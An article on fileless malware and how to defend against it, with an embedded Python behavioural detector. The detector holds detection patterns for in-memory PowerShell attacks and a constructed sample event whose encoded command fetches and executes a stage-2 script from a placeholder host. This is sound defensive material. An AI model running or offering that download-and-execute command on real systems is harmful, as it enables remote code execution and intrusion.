Fileless Attacks: Addressing Evolving Malware Threats

Even the most unskilled and inexperienced thieves stick to some basic principles – operate incognito and do not get caught. It might sound obvious, but it is the difference between success and failure for physical and cyber-criminals alike.

Just as a robber knows that it’s better to sneak into a shop via the backdoor than break down the street-facing frontage, cyber-criminals are finding more sophisticated and effective ways to stay under the radar and evade detection.

Enter fileless attacks.

Unlike traditional malware, fileless malware does not need to install code on the target’s software or systems. Fileless payloads instead run in the computer’s memory, using pre-installed system tools to carry out a ‘living off the land’ attack.

Let’s consider an example. A typical attack would see a user interacting with a URL on a malicious website or in a phishing email. Clicking the link launches a program such as Adobe Flash or Microsoft Word, which in turn runs a script that invokes PowerShell to download the payload and execute it within the computer’s memory.

So, what’s the key challenge here?

Fileless attacks aren’t necessarily more or less malicious than traditional malware attacks, and it’s not the degree of danger that’s the problem. The issue is that they can more easily bypass traditional antivirus solutions that are still commonplace in the market.

We’re often told how quickly technology is moving; that we’ll see more innovation in the coming 10 years than the previous 100, and cybercrime is no exception to this rule. It is forever evolving, and there is a growing knowledge gap regarding security best practice.

Countless organizations still rely heavily on signature-based antivirus software, but these solutions are often unable to detect fileless malware attacks. In no uncertain terms, they are outdated.

A Growing Problem of Intelligent Opportunists

Indeed, fileless attacks are an escalating problem. They increased by 265% year over year in 2019, which continued through 2020, and I expect this trend to continue in 2021.

Many threat actors are now repurposing their traditional malware to deliver it through more complex, multi-stage fileless attacks. Where it may have previously been detected by signature-based antivirus software using traditional methods, fileless techniques offer a second bite at the apple owing to their ability to bypass many detection solutions.

Recent attacks, such as TrickBot’s new ‘BazarBackdoor’ malware, are well cited, and you don’t have to look far to find them. The cloak of COVID-19 has provided a prime opportunity for hackers to play on people’s fears, and perpetrators have moved quickly to adapt their phishing hooks.

When the pandemic began to hit the news in January and February of 2020, we observed many phishing emails targeting Asian countries – things like ‘click here to see a video of Wuhan’ and those emails promising miracle remedy cures.

As the virus continued to spread, phishing emails targeting European countries emerged that were quickly adapted to begin delivering malware. For example, the AstraZeneca vaccine controversy dominating European news is frequently used as a lure in European-targeted spear-phishing campaigns. These are perhaps the most convincing yet.

What’s the Solution?

It has never been more critical for organizations and individuals alike to protect themselves. More and more cyber-criminals are identifying opportunities, with lucrative rewards such as crypto-mining providing ever-greater incentives.

Unfortunately, there is no magic bullet that completely mitigates the risks of fileless malware. That said, organizations can take numerous steps to achieve a better overall security posture.

The first is user awareness. With 95% of all cyber-attacks succeeding due to human error, phishing simulations should be used to both evaluate employee awareness and hit home just how easy it can be for fileless attacks to succeed.

Of course, awareness on its own is not enough. Human error won’t ever be eliminated entirely, and while one fileless phishing campaign might not trick one user, it could easily catch another out.

To reiterate, traditional signature-based antivirus solutions are outdated, but there are alternatives. Behavioral-based antivirus solutions now exist, while managed detection and response services help secure networks, endpoints and the cloud. Advanced email protection solutions may also be deployed to bolster overall security.

Regular patch cycles are also worth conducting, as outdated software and browser extensions can be leveraged for fileless malware attacks. Further, consider your overall security hygiene – are you using the principle of least privilege, only allowing employees enough access so that they may perform their required job?
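The behavioral alternative to signature matching that the article recommends can be illustrated for the chain described earlier (a document application launching a script host that pulls a payload straight into memory). The following is an added example, not code from the article or any vendor product: a small heuristic detector run over process-creation records. The record layout (`parent`, `image`, `cmdline`), the application and script-host lists, the rule weights, the threshold and all four sample events are assumptions constructed for the example; the lure URL uses the reserved `.invalid` domain and the encoded command is built in the script so the reader can see exactly what it decodes to.

```python
"""Behavioral detector for the 'document app -> script host -> in-memory download'
chain, run over constructed process-creation records (layout is an assumption,
not real Sysmon or EDR output)."""
import base64
import re

# Applications that routinely open attacker-supplied content (assumed list).
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Built-in script hosts used in living-off-the-land attacks (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line rules: (regex, weight, reason). Weights are illustrative only.
CMDLINE_RULES = [
    (re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I), 3, "encoded command"),
    (re.compile(r"(^|\s)-(nop|noprofile)\b", re.I), 1, "profile suppressed"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
     3, "network download"),
    (re.compile(r"invoke-expression|\biex\b", re.I), 3, "in-memory execution (IEX)"),
    (re.compile(r"frombase64string", re.I), 2, "base64 payload decoding"),
]
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed stage-2 text; encoded the way PowerShell expects (base64 of UTF-16LE).
STAGE2_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
STAGE2_ENCODED = base64.b64encode(STAGE2_PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed sample events: one fileless chain, two benign, one document app
# spawning a script host without further indicators.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + STAGE2_ENCODED},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.js"'},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or '' if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    score, reasons = 0, []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if image not in SCRIPT_HOSTS:
        return score, reasons
    if parent in DOCUMENT_APPS:
        score += 5
        reasons.append(f"{parent} spawned {image}")
    for rx, weight, why in CMDLINE_RULES:
        if rx.search(cmd):
            score += weight
            reasons.append(why)
    # A signature engine sees only base64 here; decode and re-apply the rules.
    decoded = decode_encoded_command(cmd)
    if decoded:
        for rx, weight, why in CMDLINE_RULES:
            if rx.search(decoded):
                score += weight
                reasons.append("decoded: " + why)
    return score, reasons


def detect(events, threshold=5):
    """Indices, scores and reasons of events at or above the alert threshold."""
    alerts = []
    for idx, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((idx, score, reasons))
    return alerts


if __name__ == "__main__":
    for idx, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {'; '.join(reasons)}")
```

The point of the example is the last stage of `score_event`: the raw command line of the first event contains nothing a string signature would recognise, yet decoding the `-EncodedCommand` argument and re-applying the same rules surfaces the download and in-memory execution indicators. The parent-child relationship alone (event 3, Outlook starting a script host) is enough to cross the threshold, which is the kind of behavioral signal the article contrasts with signature matching.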

Fileless malware has been around for 20 or more years, and it is not going away anytime soon.

We’ve already observed some attacks increasing in activity in 2021, such as CrySIS (aka Dharma) Ransomware, and are expecting to see crypto-mining attacks follow suit. Are you fully prepared against cyberattacks? If you have not addressed this vital question, the time to do so is now.
